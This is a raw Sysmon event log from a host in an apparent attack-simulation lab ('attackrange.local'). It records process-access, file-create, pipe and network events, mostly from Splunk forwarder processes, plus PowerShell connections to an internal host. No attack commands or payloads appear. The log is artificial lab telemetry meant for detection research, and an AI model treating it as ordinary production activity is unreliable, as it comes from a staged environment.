EventID=23 RecordID=36498844 UtcTime=2021-09-14 13:24:08.638 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=B323BAFF60BCFFB5A95DEAA9C31A1ECD,SHA256=D0CB241346DEA6671312EA0C04BE5A331255D35D4611C9DE392B4F5FC8BD913B,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=10 RecordID=36498843 UtcTime=2021-09-14 13:24:08.537 SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801} SourceProcessId=3144 SourceThreadId=3164 SourceImage=C:\Windows\system32\conhost.exe TargetProcessGUID={B81B27B7-A278-6140-BB56-04000000C801} TargetProcessId=6268 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498842 UtcTime=2021-09-14 13:24:08.535 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498841 UtcTime=2021-09-14 13:24:08.535 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498840 UtcTime=2021-09-14 13:24:08.535 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498839 UtcTime=2021-09-14 13:24:08.534 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498838 UtcTime=2021-09-14 
13:24:08.534{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.534{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.518{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:36.845{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50697-false10.0.1.12-8000- 10341000x800000000000000036498834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.003{B81B27B7-A277-6140-BA56-04000000C801}16245388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:09.800{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AE24ACAC1E4A4487B86506B01972342,SHA256=ABA269ADF44E233A460DC021E9AB92655A1D67AD9B6F51AE1F4C92EDE02ED97A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:10.816{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F32DB2E2C1E32C262E92C67CA71B82A,SHA256=2F2F8812B2932B5D848DFB9809AD3EE5BD5FBBB4ED458CA75C2331E21D2CD6F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:39.312{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50698-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:11.833{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CAA1997E8B3990395B11605B20741BE,SHA256=58DEAFFBDDDDE780FB4D04ECAC3BC799975A4CF2FC800C1771A12DDD8102D760,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:12.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36B757256AA66C3C9E338339FF2340FD,SHA256=C558994E395E3F47711A3D301313CB42938C808E5D2984960DD33497F4451618,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:12.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0FB39522DA96134C0F6FEE4DCB8B94,SHA256=A2357BA652C1EBF93946FF10BAD127D1433C9A13874FAB0B850C93246874023C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:13.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F9EC63BCF7AB5C73048E56BFD9A94E,SHA256=8CA97315A505E790EA0FE0A98892C3E99C3D616E574E1E3CA20934F9D6ABDFF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:42.876{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50699-false10.0.1.12-8000- 23542300x800000000000000036498857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:14.914{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92AA9A816025DCB984E66131E606F5A,SHA256=78AA295BC6D563336A5DAA513848E4F16336545DD551E113DA95A747FBD8C81E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:43.324{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50700-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:15.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF8ADB7DEEE6C4755A541EF33C5A6EF,SHA256=0A2E40913D3D657D14C13E1277E3B9C5CE94796BBF57FD3A7F6EE0F28E81AB76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:16.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=541472690E97A63C9E9974C977814273,SHA256=710B453342FD2AC9D5F97ECFABB1DDE5239EA743AEE62D88B97AB13464AD11CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:16.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BAC851965AAB30B7D6561478D9754EDA,SHA256=3B5061DC5644C50F131CEB9AD7E92CF16B8F8284D42A59DD0B093293947AF985,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:47.343{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50701-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:47.905{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50702-false10.0.1.12-8000- 23542300x800000000000000036498862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:18.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F4FAD5877A27FB3576745AAE71D996,SHA256=56FDBDCA3128985D922240ECAA467B5C29F2BEF0C2AED27B8288FF687A8A5C85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.755{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.718{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.718{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.671{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.671{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000036498885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:24:19.655{B81B27B7-A283-6140-BD56-04000000C801}6488\PSHost.132760994595906744.6488.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_s14gkgzn.vle.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_maiq1hrv.5rm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_maiq1hrv.5rm.ps12021-09-14 13:24:19.639 10341000x800000000000000036498881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.618{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 